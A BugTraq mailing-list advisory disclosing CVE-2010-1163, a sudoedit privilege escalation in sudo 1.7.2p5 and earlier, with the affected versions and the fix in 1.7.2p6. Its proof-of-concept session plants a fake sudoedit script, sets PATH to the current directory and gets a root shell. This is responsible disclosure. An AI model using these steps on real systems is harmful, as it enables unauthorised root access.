BugTraq
sudoedit local privilege escalation through PATH manipulation Apr 19 2010 11:04AM
Agazzini Maurizio (maurizio agazzini mediaservice net) (1 replies)
Hi all,

See attached advisory.

--
Maurizio Agazzini CISSP, OPST
Senior Security Advisor
Team Manager
@ Mediaservice.net Srl Tel: +39-011-32.72.100
Via San Bernardino, 17 Fax: +39-011-32.46.497
10141 Torino - ITALY http://mediaservice.net/
Security Advisory @ Mediaservice.net Srl
(#02, 19/04/2010) Data Security Division

Title: sudoedit local privilege escalation through PATH manipulation
Application: sudo <= 1.7.2p5
Platform: Linux, maybe others
Description: A local user with permission to run the sudoedit pseudo-command
can gain root privileges, through manipulation of the PATH
environment variable.
Authors: Valerio Costamagna <sid (at) mediaservice (dot) net [email concealed]>
Maurizio Agazzini <inode (at) mediaservice (dot) net [email concealed]>
Vendor Status: sudo team notified on 26/03/2010
CVE Candidate: The Common Vulnerabilities and Exposures project has assigned
the name CVE-2010-1163 to this issue.
References: http://lab.mediaservice.net/advisory/2010-02-sudo.txt
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1163
http://www.sudo.ws/sudo/alerts/sudoedit_escalate2.html

1. Abstract.

While writing an article about the vulnerability outlined in CVE-2010-0426, we
found a distinct security flaw, also related to the sudoedit pseudo-command.
Specifically, the path component of sudoedit is not checked correctly. This
can be easily exploited by a local user with permission to run sudoedit, in
order to execute arbitrary commands as root.

2. Example Attack Session.

inode@pandora:~$ echo "/bin/sh" > sudoedit
inode@pandora:~$ /usr/bin/chmod +x sudoedit
inode@pandora:~$ id
uid=1000(inode) gid=100(users) groups=100(users)
inode@pandora:~$ export PATH=.
inode@pandora:~$ /usr/bin/sudo sudoedit /etc/hosts
Password:
sh-3.1# /usr/bin/id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),
10(wheel),11(floppy),17(audio),18(video),19(cdrom),26(tape),83(plugdev),
84(power),
86(netdev),93(scanner)
sh-3.1#

3. Affected Platforms.

All vendors supporting sudo <= 1.7.2p5 are affected. Exploitation of this
vulnerability requires that the /etc/sudoers file be configured to allow the
attacker to run sudoedit.

4. Fix.

On April 9th 2010, version 1.7.2p6 has been relased by the sudo team, which
fixes the described vulnerability.

5. Proof Of Concept.

See Example Attack Session above.

Copyright (c) 2010 @ Mediaservice.net Srl. All rights reserved.

[ reply ]
Re: sudoedit local privilege escalation through PATH manipulation Apr 20 2010 06:42AM
Ansgar Wiechers (bugtraq planetcobalt net) (1 replies)
Re: sudoedit local privilege escalation through PATH manipulation Apr 22 2010 08:04AM
Agazzini Maurizio (inode mediaservice net)


 

Privacy Statement
Copyright 2010, SecurityFocus